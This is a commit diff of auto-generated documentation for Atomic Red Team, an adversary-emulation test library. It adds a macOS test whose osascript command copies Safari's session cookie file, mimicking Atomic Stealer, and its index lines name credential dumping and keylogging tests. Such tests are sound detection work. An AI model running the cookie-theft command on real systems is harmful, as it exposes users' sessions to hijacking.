Generated docs from job=generate-docs branch=master [ci skip]
This commit is contained in:
@@ -2,7 +2,7 @@
|
||||
|
||||
# Atomic Red Team
|
||||
|
||||
  
|
||||
  
|
||||
|
||||
|
||||
Atomic Red Team™ is a library of tests mapped to the
|
||||
|
||||
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
@@ -1539,6 +1539,7 @@ credential-access,T1539,Steal Web Session Cookie,1,Steal Firefox Cookies (Window
|
||||
credential-access,T1539,Steal Web Session Cookie,2,Steal Chrome Cookies (Windows),26a6b840-4943-4965-8df5-ef1f9a282440,powershell
|
||||
credential-access,T1539,Steal Web Session Cookie,3,Steal Chrome Cookies via Remote Debugging (Mac),e43cfdaf-3fb8-4a45-8de0-7eee8741d072,bash
|
||||
credential-access,T1539,Steal Web Session Cookie,4,Steal Chrome v127+ cookies via Remote Debugging (Windows),b647f4ee-88de-40ac-9419-f17fac9489a7,powershell
|
||||
credential-access,T1539,Steal Web Session Cookie,5,Copy Safari BinaryCookies files using AppleScript,e57ba07b-3a33-40cd-a892-748273b9b49a,sh
|
||||
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
|
||||
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
|
||||
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
|
||||
|
||||
|
@@ -190,6 +190,7 @@ privilege-escalation,T1078.003,Valid Accounts: Local Accounts,4,Enable root acco
|
||||
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
|
||||
credential-access,T1056.001,Input Capture: Keylogging,8,MacOS Swift Keylogger,aee3a097-4c5c-4fff-bbd3-0a705867ae29,bash
|
||||
credential-access,T1539,Steal Web Session Cookie,3,Steal Chrome Cookies via Remote Debugging (Mac),e43cfdaf-3fb8-4a45-8de0-7eee8741d072,bash
|
||||
credential-access,T1539,Steal Web Session Cookie,5,Copy Safari BinaryCookies files using AppleScript,e57ba07b-3a33-40cd-a892-748273b9b49a,sh
|
||||
credential-access,T1555.001,Credentials from Password Stores: Keychain,1,Keychain Dump,88e1fa00-bf63-4e5b-a3e1-e2ea51c8cca6,sh
|
||||
credential-access,T1555.001,Credentials from Password Stores: Keychain,2,Export Certificate Item(s),1864fdec-ff86-4452-8c30-f12507582a93,sh
|
||||
credential-access,T1555.001,Credentials from Password Stores: Keychain,3,Import Certificate Item(s) into Keychain,e544bbcb-c4e0-4bd0-b614-b92131635f59,sh
|
||||
|
||||
|
@@ -2136,6 +2136,7 @@
|
||||
- Atomic Test #2: Steal Chrome Cookies (Windows) [windows]
|
||||
- Atomic Test #3: Steal Chrome Cookies via Remote Debugging (Mac) [macos]
|
||||
- Atomic Test #4: Steal Chrome v127+ cookies via Remote Debugging (Windows) [windows]
|
||||
- Atomic Test #5: Copy Safari BinaryCookies files using AppleScript [macos]
|
||||
- [T1003.002 OS Credential Dumping: Security Account Manager](../../T1003.002/T1003.002.md)
|
||||
- Atomic Test #1: Registry dump of SAM, creds, and secrets [windows]
|
||||
- Atomic Test #2: Registry parse with pypykatz [windows]
|
||||
|
||||
@@ -554,6 +554,7 @@
|
||||
- T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1539 Steal Web Session Cookie](../../T1539/T1539.md)
|
||||
- Atomic Test #3: Steal Chrome Cookies via Remote Debugging (Mac) [macos]
|
||||
- Atomic Test #5: Copy Safari BinaryCookies files using AppleScript [macos]
|
||||
- T1003.002 OS Credential Dumping: Security Account Manager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1110.002 Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1003.004 OS Credential Dumping: LSA Secrets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
|
||||
@@ -90100,6 +90100,28 @@ credential-access:
|
||||
Stop-Process $chromeProcess -Force
|
||||
name: powershell
|
||||
elevation_required: false
|
||||
- name: Copy Safari BinaryCookies files using AppleScript
|
||||
auto_generated_guid: e57ba07b-3a33-40cd-a892-748273b9b49a
|
||||
description: 'This command will copy Safari BinaryCookies files using AppleScript
|
||||
as seen in Atomic Stealer.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- macos
|
||||
input_arguments:
|
||||
destination_path:
|
||||
description: Specify the path to copy the BinaryCookies file into.
|
||||
type: path
|
||||
default: "/private/tmp"
|
||||
executor:
|
||||
command: osascript -e 'tell application "Finder"' -e 'set destinationFolderPath
|
||||
to POSIX file "#{destination_path}"' -e 'set safariFolder to ((path to library
|
||||
folder from user domain as text) & "Containers:com.apple.Safari:Data:Library:Cookies:")'
|
||||
-e 'duplicate file "Cookies.binarycookies" of folder safariFolder to folder
|
||||
destinationFolderPath with replacing' -e 'end tell'
|
||||
cleanup_command: rm "#{destination_path}/Cookies.binarycookies"
|
||||
name: sh
|
||||
elevation_required: false
|
||||
T1003.002:
|
||||
technique:
|
||||
modified: '2024-10-15T16:40:52.174Z'
|
||||
|
||||
@@ -49505,6 +49505,28 @@ credential-access:
|
||||
cleanup_command: rm -rf /tmp/WhiteChocolateMacademiaNut
|
||||
name: bash
|
||||
elevation_required: false
|
||||
- name: Copy Safari BinaryCookies files using AppleScript
|
||||
auto_generated_guid: e57ba07b-3a33-40cd-a892-748273b9b49a
|
||||
description: 'This command will copy Safari BinaryCookies files using AppleScript
|
||||
as seen in Atomic Stealer.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- macos
|
||||
input_arguments:
|
||||
destination_path:
|
||||
description: Specify the path to copy the BinaryCookies file into.
|
||||
type: path
|
||||
default: "/private/tmp"
|
||||
executor:
|
||||
command: osascript -e 'tell application "Finder"' -e 'set destinationFolderPath
|
||||
to POSIX file "#{destination_path}"' -e 'set safariFolder to ((path to library
|
||||
folder from user domain as text) & "Containers:com.apple.Safari:Data:Library:Cookies:")'
|
||||
-e 'duplicate file "Cookies.binarycookies" of folder safariFolder to folder
|
||||
destinationFolderPath with replacing' -e 'end tell'
|
||||
cleanup_command: rm "#{destination_path}/Cookies.binarycookies"
|
||||
name: sh
|
||||
elevation_required: false
|
||||
T1003.002:
|
||||
technique:
|
||||
modified: '2024-10-15T16:40:52.174Z'
|
||||
|
||||
@@ -20,6 +20,8 @@ After an adversary acquires a valid cookie, they can then perform a [Web Session
|
||||
|
||||
- [Atomic Test #4 - Steal Chrome v127+ cookies via Remote Debugging (Windows)](#atomic-test-4---steal-chrome-v127-cookies-via-remote-debugging-windows)
|
||||
|
||||
- [Atomic Test #5 - Copy Safari BinaryCookies files using AppleScript](#atomic-test-5---copy-safari-binarycookies-files-using-applescript)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -261,4 +263,41 @@ Stop-Process $chromeProcess -Force
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #5 - Copy Safari BinaryCookies files using AppleScript
|
||||
This command will copy Safari BinaryCookies files using AppleScript as seen in Atomic Stealer.
|
||||
|
||||
**Supported Platforms:** macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** e57ba07b-3a33-40cd-a892-748273b9b49a
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Inputs:
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| destination_path | Specify the path to copy the BinaryCookies file into. | path | /private/tmp|
|
||||
|
||||
|
||||
#### Attack Commands: Run with `sh`!
|
||||
|
||||
|
||||
```sh
|
||||
osascript -e 'tell application "Finder"' -e 'set destinationFolderPath to POSIX file "#{destination_path}"' -e 'set safariFolder to ((path to library folder from user domain as text) & "Containers:com.apple.Safari:Data:Library:Cookies:")' -e 'duplicate file "Cookies.binarycookies" of folder safariFolder to folder destinationFolderPath with replacing' -e 'end tell'
|
||||
```
|
||||
|
||||
#### Cleanup Commands:
|
||||
```sh
|
||||
rm "#{destination_path}/Cookies.binarycookies"
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -161,6 +161,7 @@ atomic_tests:
|
||||
elevation_required: false
|
||||
|
||||
- name: Copy Safari BinaryCookies files using AppleScript
|
||||
auto_generated_guid: e57ba07b-3a33-40cd-a892-748273b9b49a
|
||||
description: |
|
||||
This command will copy Safari BinaryCookies files using AppleScript as seen in Atomic Stealer.
|
||||
supported_platforms:
|
||||
|
||||
@@ -1733,3 +1733,4 @@ a3cc9c95-c160-4b86-af6f-84fba87bfd30
|
||||
e04d2e89-de15-4d90-92f9-a335c7337f0f
|
||||
87a4a141-c2bb-49d1-a604-8679082d8b91
|
||||
5c32102a-c508-49d3-978f-288f8a9f6617
|
||||
e57ba07b-3a33-40cd-a892-748273b9b49a
|
||||
|
||||
Reference in New Issue
Block a user